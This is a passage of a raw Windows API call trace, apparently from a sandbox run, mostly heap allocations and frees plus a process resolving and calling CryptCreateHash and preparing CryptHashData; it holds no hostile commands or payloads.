hHeap=0x970000) returned 1 [0131.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0131.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0131.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0131.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0131.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0131.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0131.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0131.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0131.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0131.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0131.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0131.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0131.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0131.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0131.914] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0131.914] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e50c20, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0131.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0131.914] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0131.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0131.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0131.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0131.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0131.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0131.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0131.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0131.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0131.915] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0131.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0131.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0131.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0131.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0131.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0131.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0131.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0131.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0131.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0131.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0131.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0131.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0131.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0131.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0131.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0131.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0131.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0131.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0131.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0131.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0131.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0131.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0131.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0131.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0131.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0131.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0131.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0131.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0131.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0131.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0131.916] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0131.916] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0131.916] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0131.916] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0131.916] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0131.916] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54de8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0131.917] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0131.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c98 [0131.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0131.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0131.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0131.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0131.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0131.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0131.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0131.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0131.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0131.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54d58 [0131.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0131.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977908 [0131.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0131.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0131.917] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0131.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0131.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0131.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0131.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c28 [0131.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0131.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0131.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0131.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0131.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0131.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0131.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0131.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0131.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54d48 [0131.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0131.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0131.918] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0131.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0131.918] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54d98, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0131.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0131.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0131.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54ef8 [0131.918] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0131.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0131.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0131.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0131.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0131.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fca8 [0131.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0131.918] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0131.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fca8 | out: hHeap=0x970000) returned 1 [0131.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0131.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50998 [0131.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0131.918] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0131.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0131.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0131.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0131.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0131.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0131.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0131.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0131.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0131.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0131.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0131.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0131.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0131.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0131.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0131.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0131.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0131.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0131.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0131.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0131.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0131.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0131.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0131.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0131.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0131.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0131.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0131.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0131.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0131.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0131.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0131.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a88 [0131.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0131.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0131.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0131.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0131.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0131.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0131.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0131.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0131.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0131.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0131.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0131.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0131.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0131.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0131.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0131.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69888 [0131.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cf8 [0131.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0131.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0131.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0131.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0131.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0131.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cf8 | out: hHeap=0x970000) returned 1 [0131.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0131.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0131.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0131.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0131.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0131.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0131.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0131.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0131.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0131.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0131.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0131.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0131.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0131.921] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0131.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0131.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0131.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0131.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0131.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0131.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0131.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0131.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0131.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0131.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0131.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0131.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0131.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0131.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0131.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0131.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0131.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0131.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0131.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0131.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0131.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0131.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0131.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0131.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0131.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0131.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0131.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0131.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0131.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0131.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0131.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0131.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0131.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0131.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0131.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0131.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0131.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0131.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0131.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0131.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0131.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0131.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0131.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0131.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0131.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0131.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0131.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0131.922] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0131.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe) returned 0x2e50b60 [0131.923] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e50b60, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0131.923] HeapFree (in: hHeap=0x970000, 